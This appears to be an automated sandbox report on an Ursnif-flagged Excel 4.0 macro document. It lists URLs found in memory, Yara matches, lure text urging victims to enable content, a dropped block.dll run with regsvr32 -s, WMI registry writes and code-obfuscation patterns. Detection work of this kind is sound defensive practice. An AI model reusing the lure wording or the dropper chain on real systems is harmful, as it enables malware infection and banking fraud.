Source: DFB7A469-C2BA-4377-83DE-2A2821BDEB41.0.dr	String found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=OneDrive
Source: DFB7A469-C2BA-4377-83DE-2A2821BDEB41.0.dr	String found in binary or memory: https://insertmedia.bing.office.net/odc/insertmedia
Source: DFB7A469-C2BA-4377-83DE-2A2821BDEB41.0.dr	String found in binary or memory: https://learningtools.onenote.com/learningtoolsapi/v2.0/GetFreeformSpeech
Source: DFB7A469-C2BA-4377-83DE-2A2821BDEB41.0.dr	String found in binary or memory: https://lifecycle.office.com
Source: DFB7A469-C2BA-4377-83DE-2A2821BDEB41.0.dr	String found in binary or memory: https://login.microsoftonline.com/
Source: DFB7A469-C2BA-4377-83DE-2A2821BDEB41.0.dr	String found in binary or memory: https://login.windows-ppe.net/common/oauth2/authorize
Source: DFB7A469-C2BA-4377-83DE-2A2821BDEB41.0.dr	String found in binary or memory: https://login.windows.local
Source: DFB7A469-C2BA-4377-83DE-2A2821BDEB41.0.dr	String found in binary or memory: https://login.windows.net/72f988bf-86f1-41af-91ab-2d7cd011db47/oauth2/authorize
Source: DFB7A469-C2BA-4377-83DE-2A2821BDEB41.0.dr	String found in binary or memory: https://login.windows.net/common/oauth2/authorize
Source: DFB7A469-C2BA-4377-83DE-2A2821BDEB41.0.dr	String found in binary or memory: https://loki.delve.office.com/api/v1/configuration/officewin32/
Source: DFB7A469-C2BA-4377-83DE-2A2821BDEB41.0.dr	String found in binary or memory: https://lookup.onenote.com/lookup/geolocation/v1
Source: DFB7A469-C2BA-4377-83DE-2A2821BDEB41.0.dr	String found in binary or memory: https://management.azure.com
Source: DFB7A469-C2BA-4377-83DE-2A2821BDEB41.0.dr	String found in binary or memory: https://management.azure.com/
Source: DFB7A469-C2BA-4377-83DE-2A2821BDEB41.0.dr	String found in binary or memory: https://messaging.office.com/
Source: DFB7A469-C2BA-4377-83DE-2A2821BDEB41.0.dr	String found in binary or memory: https://na01.oscs.protection.outlook.com/api/SafeLinksApi/GetPolicy
Source: DFB7A469-C2BA-4377-83DE-2A2821BDEB41.0.dr	String found in binary or memory: https://nam.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech
Source: DFB7A469-C2BA-4377-83DE-2A2821BDEB41.0.dr	String found in binary or memory: https://ncus.contentsync.
Source: DFB7A469-C2BA-4377-83DE-2A2821BDEB41.0.dr	String found in binary or memory: https://ncus.pagecontentsync.
Source: DFB7A469-C2BA-4377-83DE-2A2821BDEB41.0.dr	String found in binary or memory: https://o365auditrealtimeingestion.manage.office.com
Source: DFB7A469-C2BA-4377-83DE-2A2821BDEB41.0.dr	String found in binary or memory: https://o365auditrealtimeingestion.manage.office.com/api/userauditrecord
Source: DFB7A469-C2BA-4377-83DE-2A2821BDEB41.0.dr	String found in binary or memory: https://o365diagnosticsppe-web.cloudapp.net
Source: DFB7A469-C2BA-4377-83DE-2A2821BDEB41.0.dr	String found in binary or memory: https://ocos-office365-s2s.msedge.net/ab
Source: DFB7A469-C2BA-4377-83DE-2A2821BDEB41.0.dr	String found in binary or memory: https://ofcrecsvcapi-int.azurewebsites.net/
Source: DFB7A469-C2BA-4377-83DE-2A2821BDEB41.0.dr	String found in binary or memory: https://officeapps.live.com
Source: DFB7A469-C2BA-4377-83DE-2A2821BDEB41.0.dr	String found in binary or memory: https://officeci.azurewebsites.net/api/
Source: DFB7A469-C2BA-4377-83DE-2A2821BDEB41.0.dr	String found in binary or memory: https://officemobile.uservoice.com/forums/929800-office-app-ios-and-ipad-asks
Source: DFB7A469-C2BA-4377-83DE-2A2821BDEB41.0.dr	String found in binary or memory: https://officesetup.getmicrosoftkey.com
Source: DFB7A469-C2BA-4377-83DE-2A2821BDEB41.0.dr	String found in binary or memory: https://ogma.osi.office.net/TradukoApi/api/v1.0/
Source: DFB7A469-C2BA-4377-83DE-2A2821BDEB41.0.dr	String found in binary or memory: https://omex.cdn.office.net/addinclassifier/officeentities
Source: DFB7A469-C2BA-4377-83DE-2A2821BDEB41.0.dr	String found in binary or memory: https://omex.cdn.office.net/addinclassifier/officeentitiesupdated
Source: DFB7A469-C2BA-4377-83DE-2A2821BDEB41.0.dr	String found in binary or memory: https://onedrive.live.com
Source: DFB7A469-C2BA-4377-83DE-2A2821BDEB41.0.dr	String found in binary or memory: https://onedrive.live.com/about/download/?windows10SyncClientInstalled=false
Source: DFB7A469-C2BA-4377-83DE-2A2821BDEB41.0.dr	String found in binary or memory: https://onedrive.live.com/embed?
Source: DFB7A469-C2BA-4377-83DE-2A2821BDEB41.0.dr	String found in binary or memory: https://outlook.office.com/
Source: DFB7A469-C2BA-4377-83DE-2A2821BDEB41.0.dr	String found in binary or memory: https://outlook.office.com/autosuggest/api/v1/init?cvid=
Source: DFB7A469-C2BA-4377-83DE-2A2821BDEB41.0.dr	String found in binary or memory: https://outlook.office365.com/
Source: DFB7A469-C2BA-4377-83DE-2A2821BDEB41.0.dr	String found in binary or memory: https://outlook.office365.com/api/v1.0/me/Activities
Source: DFB7A469-C2BA-4377-83DE-2A2821BDEB41.0.dr	String found in binary or memory: https://outlook.office365.com/autodiscover/autodiscover.json
Source: DFB7A469-C2BA-4377-83DE-2A2821BDEB41.0.dr	String found in binary or memory: https://ovisualuiapp.azurewebsites.net/pbiagave/
Source: DFB7A469-C2BA-4377-83DE-2A2821BDEB41.0.dr	String found in binary or memory: https://partnerservices.getmicrosoftkey.com/PartnerProvisioning.svc/v1/subscriptions
Source: DFB7A469-C2BA-4377-83DE-2A2821BDEB41.0.dr	String found in binary or memory: https://pf.directory.live.com/profile/mine/System.ShortCircuitProfile.json
Source: DFB7A469-C2BA-4377-83DE-2A2821BDEB41.0.dr	String found in binary or memory: https://pf.directory.live.com/profile/mine/WLX.Profiles.IC.json
Source: DFB7A469-C2BA-4377-83DE-2A2821BDEB41.0.dr	String found in binary or memory: https://portal.office.com/account/?ref=ClientMeControl
Source: DFB7A469-C2BA-4377-83DE-2A2821BDEB41.0.dr	String found in binary or memory: https://posarprodcssservice.accesscontrol.windows.net/v2/OAuth2-13
Source: DFB7A469-C2BA-4377-83DE-2A2821BDEB41.0.dr	String found in binary or memory: https://powerlift-frontdesk.acompli.net
Source: DFB7A469-C2BA-4377-83DE-2A2821BDEB41.0.dr	String found in binary or memory: https://powerlift.acompli.net
Source: DFB7A469-C2BA-4377-83DE-2A2821BDEB41.0.dr	String found in binary or memory: https://powerpoint.uservoice.com/forums/288952-powerpoint-for-ipad-iphone-ios
Source: DFB7A469-C2BA-4377-83DE-2A2821BDEB41.0.dr	String found in binary or memory: https://prod-global-autodetect.acompli.net/autodetect
Source: DFB7A469-C2BA-4377-83DE-2A2821BDEB41.0.dr	String found in binary or memory: https://r4.res.office365.com/footprintconfig/v1.7/scripts/fpconfig.json
Source: DFB7A469-C2BA-4377-83DE-2A2821BDEB41.0.dr	String found in binary or memory: https://res.getmicrosoftkey.com/api/redemptionevents
Source: DFB7A469-C2BA-4377-83DE-2A2821BDEB41.0.dr	String found in binary or memory: https://rpsticket.partnerservices.getmicrosoftkey.com
Source: DFB7A469-C2BA-4377-83DE-2A2821BDEB41.0.dr	String found in binary or memory: https://settings.outlook.com
Source: DFB7A469-C2BA-4377-83DE-2A2821BDEB41.0.dr	String found in binary or memory: https://shell.suite.office.com:1443
Source: DFB7A469-C2BA-4377-83DE-2A2821BDEB41.0.dr	String found in binary or memory: https://skyapi.live.net/Activity/
Source: DFB7A469-C2BA-4377-83DE-2A2821BDEB41.0.dr	String found in binary or memory: https://sr.outlook.office.net/ws/speech/recognize/assistant/work
Source: DFB7A469-C2BA-4377-83DE-2A2821BDEB41.0.dr	String found in binary or memory: https://staging.cortana.ai
Source: DFB7A469-C2BA-4377-83DE-2A2821BDEB41.0.dr	String found in binary or memory: https://storage.live.com/clientlogs/uploadlocation
Source: DFB7A469-C2BA-4377-83DE-2A2821BDEB41.0.dr	String found in binary or memory: https://store.office.cn/addinstemplate
Source: DFB7A469-C2BA-4377-83DE-2A2821BDEB41.0.dr	String found in binary or memory: https://store.office.com/?productgroup=Outlook
Source: DFB7A469-C2BA-4377-83DE-2A2821BDEB41.0.dr	String found in binary or memory: https://store.office.com/addinstemplate
Source: DFB7A469-C2BA-4377-83DE-2A2821BDEB41.0.dr	String found in binary or memory: https://store.office.de/addinstemplate
Source: DFB7A469-C2BA-4377-83DE-2A2821BDEB41.0.dr	String found in binary or memory: https://store.officeppe.com/addinstemplate
Source: DFB7A469-C2BA-4377-83DE-2A2821BDEB41.0.dr	String found in binary or memory: https://syncservice.protection.outlook.com/PolicySync/PolicySync.svc/SyncFile
Source: DFB7A469-C2BA-4377-83DE-2A2821BDEB41.0.dr	String found in binary or memory: https://tasks.office.com
Source: DFB7A469-C2BA-4377-83DE-2A2821BDEB41.0.dr	String found in binary or memory: https://templatelogging.office.com/client/log
Source: DFB7A469-C2BA-4377-83DE-2A2821BDEB41.0.dr	String found in binary or memory: https://uci.cdn.office.net/mirrored/smartlookup/current/
Source: DFB7A469-C2BA-4377-83DE-2A2821BDEB41.0.dr	String found in binary or memory: https://uci.officeapps.live.com/OfficeInsights/web/views/insights.desktop.html
Source: DFB7A469-C2BA-4377-83DE-2A2821BDEB41.0.dr	String found in binary or memory: https://uci.officeapps.live.com/OfficeInsights/web/views/insights.immersive.html
Source: DFB7A469-C2BA-4377-83DE-2A2821BDEB41.0.dr	String found in binary or memory: https://visio.uservoice.com/forums/368202-visio-on-devices
Source: DFB7A469-C2BA-4377-83DE-2A2821BDEB41.0.dr	String found in binary or memory: https://web.microsoftstream.com/video/
Source: DFB7A469-C2BA-4377-83DE-2A2821BDEB41.0.dr	String found in binary or memory: https://webdir.online.lync.com/autodiscover/autodiscoverservice.svc/root/
Source: DFB7A469-C2BA-4377-83DE-2A2821BDEB41.0.dr	String found in binary or memory: https://webshell.suite.office.com
Source: DFB7A469-C2BA-4377-83DE-2A2821BDEB41.0.dr	String found in binary or memory: https://word.uservoice.com/forums/304948-word-for-ipad-iphone-ios
Source: DFB7A469-C2BA-4377-83DE-2A2821BDEB41.0.dr	String found in binary or memory: https://wus2.contentsync.
Source: DFB7A469-C2BA-4377-83DE-2A2821BDEB41.0.dr	String found in binary or memory: https://wus2.pagecontentsync.
Source: DFB7A469-C2BA-4377-83DE-2A2821BDEB41.0.dr	String found in binary or memory: https://www.bingapis.com/api/v7/urlpreview/search?appid=E93048236FE27D972F67C5AF722136866DF65FA2
Source: DFB7A469-C2BA-4377-83DE-2A2821BDEB41.0.dr	String found in binary or memory: https://www.odwebp.svc.ms

Key, Mouse, Clipboard, Microphone and Screen Capturing:

Yara detected Ursnif

Source: Yara match	File source: 00000004.00000003.390807236.0000000000610000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 4.2.regsvr32.exe.67af0000.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.3.regsvr32.exe.618d29.0.raw.unpack, type: UNPACKEDPE

Yara detected Ursnif

Source: Yara match	File source: 00000004.00000003.443037975.0000000004E68000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000003.442845366.0000000004E68000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000003.442945540.0000000004E68000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000003.443128050.0000000004E68000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000003.443102271.0000000004E68000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000003.443066578.0000000004E68000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000003.442605829.0000000004E68000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000003.443010685.0000000004E68000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: regsvr32.exe PID: 1040, type: MEMORY

E-Banking Fraud:

Yara detected Ursnif

Source: Yara match	File source: 00000004.00000003.390807236.0000000000610000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 4.2.regsvr32.exe.67af0000.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.3.regsvr32.exe.618d29.0.raw.unpack, type: UNPACKEDPE

Yara detected Ursnif

Source: Yara match	File source: 00000004.00000003.443037975.0000000004E68000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000003.442845366.0000000004E68000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000003.442945540.0000000004E68000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000003.443128050.0000000004E68000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000003.443102271.0000000004E68000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000003.443066578.0000000004E68000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000003.442605829.0000000004E68000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000003.443010685.0000000004E68000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: regsvr32.exe PID: 1040, type: MEMORY

Source: C:\Windows\SysWOW64\regsvr32.exe

4_2_00BB35A1

System Summary:

Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)

Source: Screenshot number: 4	Screenshot OCR: Enable Editing 9 10 from the yellow bar above 11 12 Once You have Enable Editing, please click E
Source: Screenshot number: 4	Screenshot OCR: Enable Content 13 from the yellow bar above 14 ' , 15 " WHY I CANNOT OPEN THIS DOCUMENT? 17 i
Source: Screenshot number: 8	Screenshot OCR: Enable Editing from the yellow bar above Once You have Enable Editing , please click Enable Conten
Source: Screenshot number: 8	Screenshot OCR: Enable Content from the yellow bar above WHY I CANNOT OPEN THIS DOCUMENT? m You are using iOS orA

Found Excel 4.0 Macro with suspicious formulas

Source: 4Y2I7k0.xlsb	Initial sample: EXEC
Source: 4Y2I7k0.xlsb	Initial sample: CALL

Found abnormal large hidden Excel 4.0 Macro sheet

Source: 4Y2I7k0.xlsb	Initial sample: Sheet size: 25180
Source: 4Y2I7k0.xlsb	Initial sample: Sheet size: 45240
Source: 4Y2I7k0.xlsb	Initial sample: Sheet size: 38015

Office process drops PE file

Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	File created: C:\Users\Public\block.dll			Jump to dropped file
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\OTUW0Q90\presentation[1].dll			Jump to dropped file

Writes or reads registry keys via WMI

Source: C:\Windows\SysWOW64\regsvr32.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetStringValue
Source: C:\Windows\SysWOW64\regsvr32.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetDWORDValue
Source: C:\Windows\SysWOW64\regsvr32.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\SysWOW64\regsvr32.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue

Writes registry values via WMI

Source: C:\Windows\SysWOW64\regsvr32.exe	WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetDWORDValue
Source: C:\Windows\SysWOW64\regsvr32.exe	WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\SysWOW64\regsvr32.exe	WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue

Contains functionality to call native functions

Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 4_2_67AF1B89 NtMapViewOfSection,	4_2_67AF1B89
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 4_2_67AF18D1 GetProcAddress,NtCreateSection,memset,	4_2_67AF18D1
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 4_2_67AF2485 NtQueryVirtualMemory,	4_2_67AF2485
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 4_2_00BB3CA1 NtOpenProcess,NtOpenProcessToken,NtQueryInformationToken,NtQueryInformationToken,NtQueryInformationToken,memcpy,NtClose,NtClose,	4_2_00BB3CA1
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 4_2_00BB81CD NtQueryVirtualMemory,	4_2_00BB81CD

Detected potential crypto function

Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 4_2_67AF2264	4_2_67AF2264
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 4_2_00BB6609	4_2_00BB6609
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 4_2_00BB7FA8	4_2_00BB7FA8
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 4_2_67B3348A	4_2_67B3348A
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 4_2_67B27AD7	4_2_67B27AD7

Tries to load missing DLLs

Source: C:\Windows\SysWOW64\regsvr32.exe

Section loaded: sfc.dll

Jump to behavior

Source: classification engine

Classification label: mal100.troj.expl.evad.winXLSB@15/71@6/2

Source: C:\Windows\SysWOW64\regsvr32.exe

Code function: 4_2_00BB19E7 CreateToolhelp32Snapshot,Process32First,Process32Next,CloseHandle,

4_2_00BB19E7

Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE

File created: C:\Users\user\AppData\Local\Microsoft\Office\16.0\WebServiceCache

Jump to behavior

Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE

File created: C:\Users\user\AppData\Local\Temp\{ED20C08D-8AAC-40DA-974E-299A3F2E2000} - OProcSessId.dat

Jump to behavior

Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE

File read: C:\Users\desktop.ini

Jump to behavior

Source: C:\Windows\SysWOW64\regsvr32.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: unknown	Process created: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE 'C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE' /automation -Embedding
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process created: C:\Windows\SysWOW64\regsvr32.exe regsvr32 -s C:\Users\Public\block.dll
Source: unknown	Process created: C:\Program Files\internet explorer\iexplore.exe 'C:\Program Files\Internet Explorer\iexplore.exe' -Embedding
Source: C:\Program Files\internet explorer\iexplore.exe	Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:1268 CREDAT:17410 /prefetch:2
Source: unknown	Process created: C:\Program Files\internet explorer\iexplore.exe 'C:\Program Files\Internet Explorer\iexplore.exe' -Embedding
Source: C:\Program Files\internet explorer\iexplore.exe	Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:5788 CREDAT:17410 /prefetch:2
Source: unknown	Process created: C:\Program Files\internet explorer\iexplore.exe 'C:\Program Files\Internet Explorer\iexplore.exe' -Embedding
Source: C:\Program Files\internet explorer\iexplore.exe	Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:5660 CREDAT:17410 /prefetch:2
Source: unknown	Process created: C:\Program Files\internet explorer\iexplore.exe 'C:\Program Files\Internet Explorer\iexplore.exe' -Embedding
Source: C:\Program Files\internet explorer\iexplore.exe	Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:6312 CREDAT:17410 /prefetch:2
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process created: C:\Windows\SysWOW64\regsvr32.exe regsvr32 -s C:\Users\Public\block.dll	Jump to behavior
Source: C:\Program Files\internet explorer\iexplore.exe	Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:1268 CREDAT:17410 /prefetch:2	Jump to behavior
Source: C:\Program Files\internet explorer\iexplore.exe	Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:5788 CREDAT:17410 /prefetch:2	Jump to behavior
Source: C:\Program Files\internet explorer\iexplore.exe	Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:5660 CREDAT:17410 /prefetch:2	Jump to behavior
Source: C:\Program Files\internet explorer\iexplore.exe	Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:6312 CREDAT:17410 /prefetch:2	Jump to behavior

Source: C:\Windows\SysWOW64\regsvr32.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{4590F811-1D3A-11D0-891F-00AA004B2E24}\InprocServer32

Jump to behavior

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: 4Y2I7k0.xlsb	Initial sample: OLE zip file path = xl/media/image1.png
Source: 4Y2I7k0.xlsb	Initial sample: OLE zip file path = xl/media/image2.png
Source: 4Y2I7k0.xlsb	Initial sample: OLE zip file path = xl/media/image3.png
Source: 4Y2I7k0.xlsb	Initial sample: OLE zip file path = xl/media/image4.png

Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\LanguageResources\EnabledEditingLanguages

Jump to behavior

Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE

File opened: C:\Windows\SysWOW64\MSVCR100.dll

Jump to behavior

Source:

Binary string: c:\Whether\class\156\Through\How.pdb source: block.dll.0.dr

Data Obfuscation:

Contains functionality to dynamically determine API calls

Source: C:\Windows\SysWOW64\regsvr32.exe

Code function: 4_2_67AF1F31 LoadLibraryA,GetProcAddress,

4_2_67AF1F31

Registers a DLL

Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE

Process created: C:\Windows\SysWOW64\regsvr32.exe regsvr32 -s C:\Users\Public\block.dll

Uses code obfuscation techniques (call, push, ret)

Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 4_2_67AF2200 push ecx; ret	4_2_67AF2209
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 4_2_67AF2253 push ecx; ret	4_2_67AF2263
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 4_2_00BB7C20 push ecx; ret	4_2_00BB7C29
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 4_2_00BBB67C push ss; retf	4_2_00BBB690
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 4_2_00BB7F97 push ecx; ret	4_2_00BB7FA7
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 4_2_00BBB163 push edx; iretd	4_2_00BBB164
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 4_2_67B0677F push esi; iretd	4_2_67B0678A
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 4_2_67AFFE6C push ebx; retf	4_2_67AFFE6D
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 4_2_67B0243F push ebp; retf	4_2_67B0244E
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 4_2_67B02403 push ebp; retf	4_2_67B0244E
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 4_2_67B24475 push ecx; ret	4_2_67B24488
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 4_2_67B0446A push esi; ret	4_2_67B0446B
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 4_2_67B0633B push edx; retf	4_2_67B06345
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 4_2_67B05B7B push eax; ret	4_2_67B05B7C
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 4_2_67B3D33E push dword ptr [ecx+4BFFD4DAh]; retf	4_2_67B3D348
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 4_2_67B3E175 push ds; iretd	4_2_67B3E179

Persistence and Installation Behavior:

Drops PE files

Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	File created: C:\Users\Public\block.dll			Jump to dropped file
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\OTUW0Q90\presentation[1].dll			Jump to dropped file

Drops PE files to the user directory

Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE

File created: C:\Users\Public\block.dll

Jump to dropped file

Boot Survival:

Drops PE files to the user root directory

Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE

File created: C:\Users\Public\block.dll

Jump to dropped file

Hooking and other Techniques for Hiding and Protection:

Yara detected Ursnif

Source: Yara match	File source: 00000004.00000003.390807236.0000000000610000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 4.2.regsvr32.exe.67af0000.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.3.regsvr32.exe.618d29.0.raw.unpack, type: UNPACKEDPE

Yara detected Ursnif

Source: Yara match	File source: 00000004.00000003.443037975.0000000004E68000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000003.442845366.0000000004E68000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000003.442945540.0000000004E68000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000003.443128050.0000000004E68000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000003.443102271.0000000004E68000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000003.443066578.0000000004E68000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000003.442605829.0000000004E68000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000003.443010685.0000000004E68000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: regsvr32.exe PID: 1040, type: MEMORY

Monitors certain registry keys / values for changes (often done to protect autostart functionality)

Source: C:\Windows\SysWOW64\regsvr32.exe

Registry key monitored for changes: HKEY_CURRENT_USER_Classes

Jump to behavior

Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
